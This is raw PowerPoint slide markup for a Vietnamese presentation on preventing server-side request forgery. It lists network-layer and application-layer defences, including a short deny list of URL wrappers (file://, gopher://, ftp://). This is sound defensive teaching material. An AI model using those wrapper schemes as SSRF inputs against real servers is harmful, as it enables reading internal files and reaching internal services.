            <a:ext cx="7253883" cy="647700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="5050"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="76B9FF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Slab" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Slab" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Slab" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>2. Nội dung dự kiến thực hiện</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="725329" y="1859875"/>
            <a:ext cx="11853982" cy="388501"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="3050"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="76B9FF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Slab" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Slab" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Slab" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Triển khai các phương pháp phòng chống (các biện pháp phòng chống hiện nay).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="725329" y="2559248"/>
            <a:ext cx="2590562" cy="323850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2500"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="76B9FF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Slab" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Slab" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto Slab" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Từ tầng Network</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="725329" y="3193971"/>
            <a:ext cx="13179743" cy="3315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Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Phân đoạn chức năng truy cập tài nguyên từ xa trong các mạng riêng biệt để giảm tác động của SSRF</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="725329" y="3598069"/>
            <a:ext cx="13179743" cy="3315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Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Ngăn chặn các wrapper không cần thiết, chẳng hạn file://, gopher://, ftp://, ...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="725329" y="4002167"/>
            <a:ext cx="13179743" cy="3315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Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Thực thi các chính sách tường lửa "deny by default" hoặc quy tắc kiểm soát truy cập mạng để chặn tất cả trừ lưu lượng nội bộ thiết yếu.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="725329" y="4566880"/>
            <a:ext cx="13179743" cy="331589"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2600"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6E5EF"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Gợi ý:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="725329" y="5131594"/>
            <a:ext cx="13179743" cy="3315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Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Thiết lập quyền sở hữu và vòng đời cho các quy tắc tường lửa dựa trên ứng dụng.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="725329" y="5535692"/>
            <a:ext cx="13179743" cy="331589"/>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D6E5EF"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Ghi nhật ký tất cả các luồng mạng được chấp nhận </a:t>
            </a:r>
            <a:pPr algn="l" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2600"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6E5EF"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>và</a:t>
            </a:r>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 bị chặn trên tường lửa (</a:t>
            </a:r>
            <a:pPr algn="l" indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2600"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="66A8EE"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Robo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A09:2021-Security Logging and Monitoring Failures</a:t>
            </a:r>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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="725329" y="6100405"/>
            <a:ext cx="13179743" cy="663178"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2600"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D6E5EF"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Lưu ý: Hết sức cẩn thận khi sử dụng các danh sách từ chối truy cập phổ biến. Vì các attacker cũng có thể biết được danh sách đó và tìm cách bypass nó.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="725329" y="6996708"/>
            <a:ext cx="13179743" cy="331589"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2600"/>
              </a:lnSpc>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97298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Từ tầng Application</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="278094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Làm sạch và xác thực tất cả dữ liệu đầu vào do khách hàng cung cấp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="322314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Thực thi lược đồ URL, cổng và đích đến với danh sách cho phép tích cực</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="3665339"/>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Không gửi phản hồi thô cho người dùng, thống nhất các thông báo lỗi, hạn chế kẻ tấn công dựa vào sự khác nhau giữa các thông báo lỗi khai thác thông tin hữu ích.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="447044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Tắt chuyển hướng HTTP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="4912638"/>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Lưu ý đến tính nhất quán của URL để tránh các cuộc tấn công như DNS rebinding và điều kiện "time of check, time of use" (TOCTOU)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="5893594"/>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D6E5EF"/>
                </a:solidFill>
                <a:latin typeface="Roboto" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Roboto" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Ngoài ra còn có các biện pháp khác như: Kiểm tra lưu lượng cục bộ (localhost), sử dụng mã hóa mạng (VPN),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2024-11-29T09:28:25Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-29T09:28:25Z</dcterms:modified>
</cp:coreProperties>
</file>